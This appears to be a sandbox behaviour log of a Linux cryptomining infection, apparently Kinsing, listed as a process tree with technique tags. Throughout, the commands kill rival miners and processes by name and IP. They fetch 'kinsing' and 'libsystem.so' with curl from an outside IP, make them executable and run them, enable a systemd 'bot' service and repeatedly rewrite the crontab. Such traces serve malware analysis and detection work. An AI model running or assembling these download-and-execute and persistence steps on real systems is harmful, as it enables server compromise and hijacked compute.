/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1430
-
-
/bin/grepgrep exe2⤵PID:1433
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1432
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1435
-
-
/usr/bin/idid -u2⤵PID:1436
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1437 -
/usr/sbin/sendmailsendmail -t3⤵PID:1440
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNlL-0000NE-H64⤵
- Reads CPU attributes
PID:1452
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1443
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNlL-0000NH-K54⤵
- Reads CPU attributes
PID:1453
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1444
-
-
-
/usr/bin/idid -u2⤵PID:1445
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1446
-
-
/bin/unameuname -m2⤵PID:1447
-
-
/bin/lsls -la /etc/data2⤵PID:1449
-
-
/bin/grepgrep -e /dev2⤵PID:1450
-
-
/bin/grepgrep -v grep2⤵PID:1451
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1454
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1455
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1457
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1460
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1461
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1463
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1464
-
-
/bin/grepgrep :14142⤵PID:1466
-
-
/bin/grepgrep -v -2⤵PID:1469
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1467
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1468
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1470
-
-
/bin/grepgrep -v grep2⤵PID:1473
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1472
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1474
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1475
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1471
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1476
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1479
-
-
/bin/grepgrep stratum2⤵PID:1477
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1485
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1484
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/bin/grepgrep Sofia2⤵PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1481
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1486
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1491
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1489
-
-
/bin/grepgrep tracepath2⤵PID:1488
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1487
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1495
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/bin/grepgrep /dot2⤵PID:1493
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1492
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1498
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1505
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1506
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1503
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1510
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1511
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/bin/grepgrep "bash -k"2⤵PID:1508
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1507
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1515
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1516
-
-
/bin/grepgrep perfctl2⤵PID:1513
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1512
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1517
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1518
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/bin/grepgrep ./ll12⤵PID:1520
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1519
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1527
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/bin/grepgrep agetty2⤵PID:1525
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1524
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/bin/grepgrep -v -2⤵PID:1534
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1533
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1535
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1532
-
-
/bin/grepgrep 207.38.87.62⤵PID:1531
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1539
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1538
-
-
/bin/grepgrep -v -2⤵PID:1540
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1537
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1541
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1545
-
-
/bin/grepgrep -v -2⤵PID:1546
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1544
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1547
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1543
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1551
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1550
-
-
/bin/grepgrep -v -2⤵PID:1552
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1549
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1553
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1557
-
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
PID:1556
-
-
/bin/grepgrep -v -2⤵PID:1558
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1555
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1559
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1560
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1561
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1562
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1563
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1564
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1567
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1568
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1569
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1570
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1583
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1586
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1591
-
-
/bin/grepgrep -v grep2⤵PID:1589
-
-
/bin/grepgrep ./udp2⤵PID:1588
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1587
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1592
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1594
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1593
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1597
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1596
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1598
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1600
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1599
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1601
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1603
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1602
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1606
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1605
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1608
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1610
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1611
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1613
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1615
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1614
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1616
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1617
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1618
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1621
-
-
/bin/catcat /data/./oka.pid2⤵PID:1620
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1622
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1623
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1625
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1626
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1628
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1629
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1630
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1631
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1632
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1633
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1634
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1638
-
-
/bin/grepgrep -v grep2⤵PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1639
-
-
/bin/grepgrep ./oka2⤵PID:1636
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1635
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1643
-
-
/bin/grepgrep -v grep2⤵PID:1642
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1644
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1641
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1640
-
-
/bin/grepgrep -v bin2⤵PID:1647
-
-
/bin/grepgrep -v "\\["2⤵PID:1648
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1646
-
-
/bin/grepgrep -v "("2⤵PID:1649
-
-
/bin/grepgrep -v php-fpm2⤵PID:1650
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1645
-
-
/bin/grepgrep -v proxymap2⤵PID:1651
-
-
/bin/grepgrep -v postgres2⤵PID:1652
-
-
/bin/grepgrep -v postgrey2⤵PID:1653
-
-
/bin/grepgrep -v kinsing2⤵PID:1654
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1656
-
-
/bin/grepgrep -v bin2⤵PID:1659
-
-
/bin/grepgrep -v "\\["2⤵PID:1660
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1658
-
-
/bin/grepgrep -v "("2⤵PID:1661
-
-
/bin/grepgrep -v php-fpm2⤵PID:1662
-
-
/bin/grepgrep -v proxymap2⤵PID:1663
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1657
-
-
/bin/grepgrep -v postgres2⤵PID:1664
-
-
/bin/grepgrep -v postgrey2⤵PID:1665
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1666
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1667
-
-
/bin/grepgrep -v bin2⤵PID:1670
-
-
/bin/grepgrep -v "\\["2⤵PID:1671
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1669
-
-
/bin/grepgrep -v "("2⤵PID:1672
-
-
/bin/grepgrep -v php-fpm2⤵PID:1673
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1668
-
-
/bin/grepgrep -v proxymap2⤵PID:1674
-
-
/bin/grepgrep -v postgres2⤵PID:1675
-
-
/bin/grepgrep -v postgrey2⤵PID:1676
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1677
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1678
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1681
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1682
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/grepgrep -v grep2⤵PID:1680
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1679
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1687
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1686
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1688
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1689
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1690
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1691
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1695
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1694
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1698
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1699
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1700
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1701
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1702
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1706
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1705
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1708
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1709
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1713
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1712
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1714
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1715
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1716
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1717
-
-
/usr/bin/idid -u2⤵PID:1719
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1720
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1733
-
-
/bin/sedsed /base64/d2⤵PID:1738
-
-
/usr/bin/crontabcrontab -l2⤵PID:1737
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1739
-
-
/bin/sedsed /_cron/d2⤵PID:1741
-
-
/usr/bin/crontabcrontab -l2⤵PID:1740
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1742
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1744
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1745
-
-
/usr/bin/crontabcrontab -l2⤵PID:1743
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1748
-
-
/bin/sedsed /update.sh/d2⤵PID:1747
-
-
/usr/bin/crontabcrontab -l2⤵PID:1746
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/bin/sedsed /logo4/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/bin/sedsed /logo9/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/bin/sedsed /logo0/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/bin/sedsed /logo/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/bin/sedsed /tor2web/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/bin/sedsed /jpg/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/bin/sedsed /png/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/bin/sedsed /tmp/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/bin/sedsed /pastebin/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/bin/sedsed /onion/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/bin/sedsed /shuf/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/bin/sedsed /ash/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/bin/sedsed /mr.sh/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1812
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1811
-
-
/usr/bin/crontabcrontab -l2⤵PID:1810
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1815
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1818
-
-
/bin/sedsed /github/d2⤵PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1821
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1819
-
-
/usr/bin/crontabcrontab -l2⤵PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1824
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1823
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1826
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1827
-
-
/usr/bin/crontabcrontab -l2⤵PID:1825
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1830
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1829
-
-
/usr/bin/crontabcrontab -l2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1833
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1831
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1836
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1835
-
-
/usr/bin/crontabcrontab -l2⤵PID:1834
-
-
